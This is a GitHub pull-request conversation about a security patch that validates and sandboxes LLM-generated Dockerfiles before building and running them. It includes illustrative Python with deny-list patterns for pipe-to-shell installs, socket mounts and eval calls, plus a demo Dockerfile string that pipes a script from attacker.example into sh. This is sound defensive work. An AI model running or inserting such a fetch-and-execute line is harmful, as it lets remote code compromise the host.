Conversation

@pensarapp pensarapp bot commented Apr 1, 2025

Secured with Pensar

Type: Application
Identifier: ML09
Severity: high
Message: The run_locally function writes out and executes Dockerfiles and code files that are generated by an LLM. Since the LLM outputs are used directly without additional verification or sandboxing, malicious transformations in these outputs can lead to Docker build and container run steps executing unintended or harmful commands. This is particularly dangerous given the Docker-in-Docker setup, and falls under CWE ML09, where manipulated ML model outputs compromise system integrity.

The original code had a critical security vulnerability (CWE ML09) where LLM-generated Dockerfiles and code files were being written to the filesystem and executed without validation or sandboxing. This could allow malicious code to run within Docker containers, potentially leading to privilege escalation, container breakout, or other security issues.

The patch implements several security measures:

  1. Content Validation: Added two new validation functions:

    • validate_dockerfile(): Checks Dockerfiles for dangerous patterns like privileged mode, host network access, sensitive volume mounts, etc.
    • validate_file_content(): Analyzes code files for dangerous patterns like subprocess calls, eval(), system commands, etc.
  2. Path Traversal Prevention: Added checks to ensure file paths don't attempt to escape the designated directory.

  3. Docker Sandboxing: Enhanced Docker run command with security constraints:

    • Read-only filesystem
    • Network isolation
    • Memory and CPU limits
    • Capability restrictions
    • Privilege escalation prevention
  4. Resource Protection: Added timeouts for both build and run operations to prevent resource exhaustion.

  5. Unique Image Names: Used timestamp-based image names to prevent conflicts and container poisoning.

These changes mitigate the risk of executing malicious LLM-generated code while maintaining the original functionality. The patch adds the re module import which was not previously present, but this is a standard library module and doesn't introduce external dependencies.
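The controls listed in the comment above, as an added illustration that is not the project's code or the patch itself: deny-list validation of generated Dockerfiles and code files, a path-traversal guard, a constrained `docker run` argument list, a subprocess timeout and a timestamp-based image name. Function names (`validate_dockerfile`, `validate_file_content`, `safe_join`, `sandboxed_run_command`, `run_with_timeout`, `unique_image_name`), the specific deny-list patterns and the resource limits are this example's own choices; the `docker run` flags are real Docker CLI options. Nothing here invokes Docker; the sample Dockerfile and code strings are constructed.

```python
"""Hardening checks for LLM-generated Dockerfiles and code (added example,
not the project's implementation; names and patterns are assumptions)."""
import os
import re
import subprocess
import sys
import time

# Hypothetical deny-list for generated Dockerfiles: (regex, reason).
DOCKERFILE_DENYLIST = [
    (re.compile(r"--privileged\b"), "privileged mode"),
    (re.compile(r"--network[= ]host\b"), "host network access"),
    (re.compile(r"/var/run/docker\.sock"), "Docker socket mount"),
    (re.compile(r"(?m)^\s*(ADD|COPY)\s+(/etc/|/root/|~|\.\./)"),
     "sensitive or out-of-tree source path"),
    (re.compile(r"(curl|wget)\b[^\n|]*\|\s*(sh|bash)\b"), "pipe-to-shell install"),
]

# Hypothetical deny-list for generated code files: (regex, reason).
CODE_DENYLIST = [
    (re.compile(r"\bsubprocess\.|\bos\.system\s*\(|\bos\.popen\s*\("),
     "shell/subprocess execution"),
    (re.compile(r"\beval\s*\(|\bexec\s*\("), "dynamic code execution"),
    (re.compile(r"\bctypes\b|\bimport\s+socket\b"), "native or raw network access"),
]


def validate_dockerfile(text):
    """Return the reasons the Dockerfile is rejected; [] means it passed."""
    return [reason for pattern, reason in DOCKERFILE_DENYLIST if pattern.search(text)]


def validate_file_content(text):
    """Return the reasons a generated code file is rejected; [] means it passed."""
    return [reason for pattern, reason in CODE_DENYLIST if pattern.search(text)]


def safe_join(base_dir, relative_path):
    """Resolve relative_path under base_dir and refuse any escape.

    realpath() collapses '..' and symlinks; commonpath() then proves the
    result still lies inside base_dir. An absolute path is rejected too,
    because os.path.join discards base_dir when the second part is absolute."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, relative_path))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path escapes sandbox directory: {relative_path!r}")
    return target


def sandboxed_run_command(image, memory="512m", cpus="1.0"):
    """Build argv for a constrained `docker run` (limits are this example's)."""
    return [
        "docker", "run", "--rm",
        "--read-only",                                  # immutable root filesystem
        "--tmpfs", "/tmp:rw,noexec,nosuid,size=64m",    # scratch space, no exec
        "--network", "none",                            # no network at all
        "--memory", memory, "--cpus", cpus,             # resource caps
        "--pids-limit", "256",                          # fork-bomb guard
        "--cap-drop", "ALL",                            # drop every capability
        "--security-opt", "no-new-privileges",          # block setuid escalation
        "--user", "65534:65534",                        # run as nobody
        image,
    ]


def run_with_timeout(argv, timeout_s):
    """Run argv, killing it after timeout_s. Returns (returncode, timed_out)."""
    try:
        proc = subprocess.run(argv, capture_output=True, timeout=timeout_s)
        return proc.returncode, False
    except subprocess.TimeoutExpired:   # subprocess.run kills the child for us
        return None, True


def run_python_with_timeout(code, timeout_s):
    """Demo helper: run a Python snippet under the build/run timeout."""
    return run_with_timeout([sys.executable, "-c", code], timeout_s)


def unique_image_name(prefix="llm-app"):
    """Timestamp plus PID keeps concurrent jobs from reusing a tag."""
    return f"{prefix}:{int(time.time() * 1000)}-{os.getpid()}"


if __name__ == "__main__":
    # Constructed sample of a hostile generated Dockerfile.
    hostile = "FROM alpine\nRUN wget -qO- http://attacker.example/i.sh | sh\n"
    print("dockerfile rejected for:", validate_dockerfile(hostile))
    print("run argv:", " ".join(sandboxed_run_command(unique_image_name())))
    print("timeout hit:", run_python_with_timeout("import time; time.sleep(30)", 1))
```

The two validators are deny-lists, so they catch the patterns named in the comment but cannot prove generated content safe; the `docker run` constraints are the control that still holds when a pattern is missed, which is why both layers are kept.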

restack-app bot commented Apr 1, 2025

No applications have been configured for previews targeting branch: master. To do so go to restack console and configure your applications for previews.
